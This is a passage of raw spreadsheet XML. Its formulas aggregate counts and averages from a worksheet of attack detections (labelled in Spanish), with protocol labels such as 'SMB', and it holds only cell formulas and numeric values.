        <f>SUMIFS('(B) - Detecciones - Ataques'!$FT3:$FT139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AW27)</f>
        <v>0</v>
      </c>
      <c r="AX39" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FT3:$FT139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AX27)</f>
        <v>14</v>
      </c>
      <c r="AY39" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FT3:$FT139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AY27)</f>
        <v>0</v>
      </c>
      <c r="AZ39" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FT3:$FT139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AZ27)</f>
        <v>5</v>
      </c>
      <c r="BA39" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FT3:$FT139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BA27)</f>
        <v>2</v>
      </c>
      <c r="BB39" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FT3:$FT139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BB27)</f>
        <v>0</v>
      </c>
      <c r="BC39" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FT3:$FT139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BC27)</f>
        <v>14134</v>
      </c>
      <c r="BD39" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FT3:$FT139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BD27)</f>
        <v>0</v>
      </c>
      <c r="BE39" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FT3:$FT139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BE27)</f>
        <v>3</v>
      </c>
      <c r="BF39" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FT3:$FT139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BF27)</f>
        <v>4</v>
      </c>
      <c r="BG39" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FT3:$FT139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BG27)</f>
        <v>1</v>
      </c>
      <c r="BH39" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FT3:$FT139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BH27)</f>
        <v>1</v>
      </c>
      <c r="BI39" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FT3:$FT139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BI27)</f>
        <v>1</v>
      </c>
      <c r="BJ39" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FT3:$FT139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BJ27)</f>
        <v>3</v>
      </c>
      <c r="BK39" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FT3:$FT139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BK27)</f>
        <v>9</v>
      </c>
      <c r="BL39" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FT3:$FT139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BL27)</f>
        <v>2</v>
      </c>
      <c r="BM39" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FT3:$FT139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BM27)</f>
        <v>19645</v>
      </c>
      <c r="BN39" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FT3:$FT139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BN27)</f>
        <v>120158</v>
      </c>
      <c r="BO39" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FT3:$FT139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BO27)</f>
        <v>0</v>
      </c>
      <c r="BP39" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FT3:$FT139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BP27)</f>
        <v>0</v>
      </c>
      <c r="BQ39" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FT3:$FT139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BQ27)</f>
        <v>13</v>
      </c>
      <c r="BR39" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FT3:$FT139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BR27)</f>
        <v>0</v>
      </c>
      <c r="BS39" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FT3:$FT139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BS27)</f>
        <v>6</v>
      </c>
      <c r="BT39" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FT3:$FT139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BT27)</f>
        <v>2</v>
      </c>
      <c r="BU39" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FT3:$FT139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BU27)</f>
        <v>0</v>
      </c>
      <c r="BV39" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FT3:$FT139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BV27)</f>
        <v>1</v>
      </c>
      <c r="BW39" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FT3:$FT139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BW27)</f>
        <v>5</v>
      </c>
      <c r="BX39" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FT3:$FT139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BX27)</f>
        <v>0</v>
      </c>
      <c r="BY39" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FT3:$FT139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BY27)</f>
        <v>53</v>
      </c>
      <c r="BZ39" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FT3:$FT139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BZ27)</f>
        <v>125</v>
      </c>
      <c r="CA39" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FT3:$FT139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CA27)</f>
        <v>0</v>
      </c>
      <c r="CB39" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FT3:$FT139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CB27)</f>
        <v>2</v>
      </c>
      <c r="CC39" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FT3:$FT139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CC27)</f>
        <v>1</v>
      </c>
      <c r="CD39" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FT3:$FT139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CD27)</f>
        <v>1</v>
      </c>
      <c r="CE39" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FT3:$FT139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CE27)</f>
        <v>0</v>
      </c>
      <c r="CF39" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FT3:$FT139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CF27)</f>
        <v>2</v>
      </c>
      <c r="CG39" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FT3:$FT139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CG27)</f>
        <v>1</v>
      </c>
      <c r="CH39" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FT3:$FT139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CH27)</f>
        <v>9</v>
      </c>
      <c r="CI39" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FT3:$FT139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CI27)</f>
        <v>23</v>
      </c>
      <c r="CJ39" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FT3:$FT139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CJ27)</f>
        <v>2</v>
      </c>
      <c r="CK39" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FT3:$FT139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CK27)</f>
        <v>7</v>
      </c>
      <c r="CL39" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FT3:$FT139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CL27)</f>
        <v>0</v>
      </c>
      <c r="CM39" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FT3:$FT139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CM27)</f>
        <v>88</v>
      </c>
      <c r="CN39" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FT3:$FT139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CN27)</f>
        <v>1</v>
      </c>
      <c r="CO39" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FT3:$FT139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CO27)</f>
        <v>6</v>
      </c>
      <c r="CP39" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FT3:$FT139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CP27)</f>
        <v>27</v>
      </c>
      <c r="CQ39" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FT3:$FT139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CQ27)</f>
        <v>4</v>
      </c>
      <c r="CR39" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FT3:$FT139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CR27)</f>
        <v>0</v>
      </c>
      <c r="CS39" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FT3:$FT139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CS27)</f>
        <v>149</v>
      </c>
      <c r="CT39" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FT3:$FT139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CT27)</f>
        <v>10</v>
      </c>
      <c r="CU39" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FT3:$FT139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CU27)</f>
        <v>0</v>
      </c>
      <c r="CV39" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FT3:$FT139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CV27)</f>
        <v>7</v>
      </c>
      <c r="CW39" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FT3:$FT139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CW27)</f>
        <v>0</v>
      </c>
      <c r="CX39" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FT3:$FT139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CX27)</f>
        <v>2</v>
      </c>
      <c r="CY39" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FT3:$FT139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CY27)</f>
        <v>4</v>
      </c>
      <c r="CZ39" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FT3:$FT139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CZ27)</f>
        <v>0</v>
      </c>
      <c r="DA39" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FT3:$FT139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DA27)</f>
        <v>0</v>
      </c>
      <c r="DB39" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FT3:$FT139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DB27)</f>
        <v>0</v>
      </c>
      <c r="DC39" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FT3:$FT139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DC27)</f>
        <v>0</v>
      </c>
      <c r="DD39" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FT3:$FT139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DD27)</f>
        <v>17</v>
      </c>
      <c r="DE39" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FT3:$FT139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DE27)</f>
        <v>2</v>
      </c>
      <c r="DF39" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FT3:$FT139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DF27)</f>
        <v>9</v>
      </c>
      <c r="DG39" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FT3:$FT139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DG27)</f>
        <v>0</v>
      </c>
      <c r="DH39" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FT3:$FT139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DH27)</f>
        <v>878</v>
      </c>
      <c r="DI39" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FT3:$FT139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DI27)</f>
        <v>112</v>
      </c>
      <c r="DJ39" s="356">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FT3:$FT139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DJ27)</f>
        <v>16</v>
      </c>
      <c r="DK39" s="271"/>
      <c r="DO39" s="357"/>
      <c r="DP39" s="358" t="s">
        <v>310</v>
      </c>
      <c r="DQ39" s="359">
        <v>0.0</v>
      </c>
      <c r="DR39" s="359">
        <v>2.0</v>
      </c>
      <c r="DS39" s="359">
        <v>2.0</v>
      </c>
      <c r="DT39" s="359">
        <v>2.0</v>
      </c>
      <c r="DU39" s="360">
        <v>4.0</v>
      </c>
      <c r="DV39" s="271"/>
      <c r="DW39" s="358" t="s">
        <v>310</v>
      </c>
      <c r="DX39" s="359">
        <v>0.0</v>
      </c>
      <c r="DY39" s="359">
        <v>2.0</v>
      </c>
      <c r="DZ39" s="359">
        <v>2.0</v>
      </c>
      <c r="EA39" s="359">
        <v>2.0</v>
      </c>
      <c r="EB39" s="360">
        <v>5.0</v>
      </c>
      <c r="EC39" s="271"/>
      <c r="ED39" s="280"/>
      <c r="EG39" s="279"/>
      <c r="EH39" s="271"/>
      <c r="EI39" s="358" t="s">
        <v>310</v>
      </c>
      <c r="EJ39" s="359">
        <f>SUMIFS('(B) - Detecciones - Ataques'!AL$3:AL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EI39,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!AL$3:AL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $S37 &amp; "*")</f>
        <v>2</v>
      </c>
      <c r="EK39" s="359">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BX$3:$BX$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EI39,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!BX$3:BX$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EI39 &amp; "*")</f>
        <v>12</v>
      </c>
      <c r="EL39" s="359">
        <f>SUMIFS('(B) - Detecciones - Ataques'!DN$3:DN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EI39,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!DN$3:DN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EI39 &amp; "*")</f>
        <v>14</v>
      </c>
      <c r="EM39" s="359">
        <f>SUMIFS('(B) - Detecciones - Ataques'!FD$3:FD$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EI39,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!FD$3:FD$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EI39 &amp; "*")</f>
        <v>29</v>
      </c>
      <c r="EN39" s="360">
        <f t="shared" si="4"/>
        <v>29</v>
      </c>
      <c r="EO39" s="364"/>
      <c r="EP39" s="364"/>
      <c r="EQ39" s="364"/>
      <c r="ER39" s="271"/>
      <c r="ES39" s="271"/>
      <c r="ET39" s="271"/>
      <c r="EU39" s="271"/>
      <c r="EV39" s="379" t="s">
        <v>310</v>
      </c>
      <c r="EW39" s="389">
        <f t="shared" si="8"/>
        <v>0.4</v>
      </c>
      <c r="EX39" s="389">
        <f t="shared" si="9"/>
        <v>2.4</v>
      </c>
      <c r="EY39" s="389">
        <f t="shared" si="10"/>
        <v>2.8</v>
      </c>
      <c r="EZ39" s="390">
        <f t="shared" si="11"/>
        <v>5.8</v>
      </c>
      <c r="FA39" s="367"/>
      <c r="FC39" s="281" t="s">
        <v>2487</v>
      </c>
      <c r="FD39" s="221"/>
      <c r="FE39" s="221"/>
      <c r="FF39" s="221"/>
      <c r="FG39" s="221"/>
      <c r="FH39" s="222"/>
      <c r="FK39" s="411" t="s">
        <v>558</v>
      </c>
      <c r="FL39" s="412">
        <f>SUMIFS('(B) - Detecciones - Ataques'!AP$3:AP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FK39,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!AP$3:AP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FK39 &amp; "*")</f>
        <v>2</v>
      </c>
      <c r="FM39" s="412">
        <f>SUMIFS('(B) - Detecciones - Ataques'!CB$3:CB$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FK39,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!CB$3:CB$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FK39 &amp; "*")</f>
        <v>14</v>
      </c>
      <c r="FN39" s="412">
        <f>SUMIFS('(B) - Detecciones - Ataques'!DR$3:DR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FK39,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!DR$3:DR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FK39 &amp; "*")</f>
        <v>24</v>
      </c>
      <c r="FO39" s="413">
        <f>SUMIFS('(B) - Detecciones - Ataques'!FH$3:FH$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FK39,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!FH$3:FH$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FK39 &amp; "*")</f>
        <v>37</v>
      </c>
      <c r="FP39" s="392"/>
      <c r="FQ39" s="411" t="s">
        <v>558</v>
      </c>
      <c r="FR39" s="414">
        <f t="shared" ref="FR39:FU39" si="24">1-(FL39/EJ41)</f>
        <v>0</v>
      </c>
      <c r="FS39" s="414">
        <f t="shared" si="24"/>
        <v>0</v>
      </c>
      <c r="FT39" s="414">
        <f t="shared" si="24"/>
        <v>0</v>
      </c>
      <c r="FU39" s="415">
        <f t="shared" si="24"/>
        <v>0.2291666667</v>
      </c>
      <c r="FV39" s="392"/>
      <c r="FW39" s="392"/>
      <c r="FX39" s="392"/>
      <c r="FY39" s="392"/>
      <c r="FZ39" s="392"/>
      <c r="GA39" s="392"/>
      <c r="GB39" s="392"/>
      <c r="GC39" s="392"/>
      <c r="GD39" s="392"/>
      <c r="GE39" s="392"/>
      <c r="GF39" s="392"/>
      <c r="GG39" s="409" t="str">
        <f>IFERROR(__xludf.DUMMYFUNCTION("""COMPUTED_VALUE"""),"SMB")</f>
        <v>SMB</v>
      </c>
      <c r="GH39" s="368">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG39)</f>
        <v>1</v>
      </c>
      <c r="GI39" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GQ$3:$GQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG39)</f>
        <v>1</v>
      </c>
      <c r="GJ39" s="373">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GR$3:$GR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG39)</f>
        <v>1</v>
      </c>
      <c r="GK39" s="409" t="str">
        <f>IFERROR(__xludf.DUMMYFUNCTION("""COMPUTED_VALUE"""),"SMB")</f>
        <v>SMB</v>
      </c>
      <c r="GL39" s="368">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ET$3:$ET$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG39)</f>
        <v>1</v>
      </c>
      <c r="GM39" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$FA$3:$FA$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG39)</f>
        <v>1</v>
      </c>
      <c r="GN39" s="374">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$FB$3:$FB$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG39)</f>
        <v>1</v>
      </c>
      <c r="GO39" s="409" t="str">
        <f>IFERROR(__xludf.DUMMYFUNCTION("""COMPUTED_VALUE"""),"SMB")</f>
        <v>SMB</v>
      </c>
      <c r="GP39" s="368">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DD$3:$DD$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG39)</f>
        <v>1</v>
      </c>
      <c r="GQ39" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DK$3:$DK$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG39)</f>
        <v>1</v>
      </c>
      <c r="GR39" s="374">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DL$3:$DL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG39)</f>
        <v>1</v>
      </c>
      <c r="GS39" s="409" t="str">
        <f>IFERROR(__xludf.DUMMYFUNCTION("""COMPUTED_VALUE"""),"SMB")</f>
        <v>SMB</v>
      </c>
      <c r="GT39" s="368">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BN$3:$BN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG39)</f>
        <v>0.5</v>
      </c>
      <c r="GU39" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BU$3:$BU$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG39)</f>
        <v>0.5</v>
      </c>
      <c r="GV39" s="374">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BV$3:$BV$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG39)</f>
        <v>1</v>
      </c>
      <c r="GW39" s="392"/>
      <c r="GX39" s="392"/>
      <c r="GY39" s="392"/>
      <c r="GZ39" s="392"/>
      <c r="HA39" s="392"/>
      <c r="HB39" s="392"/>
      <c r="HC39" s="392"/>
      <c r="HD39" s="392"/>
      <c r="HE39" s="392"/>
      <c r="HF39" s="392"/>
      <c r="HG39" s="392"/>
      <c r="HH39" s="392"/>
      <c r="HI39" s="392"/>
      <c r="HJ39" s="392"/>
      <c r="HK39" s="392"/>
      <c r="HL39" s="392"/>
      <c r="HM39" s="392"/>
      <c r="HN39" s="392"/>
      <c r="HO39" s="392"/>
      <c r="HP39" s="392"/>
    </row>
    <row r="40">
      <c r="B40" s="277"/>
      <c r="C40" s="271"/>
      <c r="D40" s="271"/>
      <c r="E40" s="271"/>
      <c r="F40" s="271"/>
      <c r="G40" s="278"/>
      <c r="J40" s="277"/>
      <c r="K40" s="349">
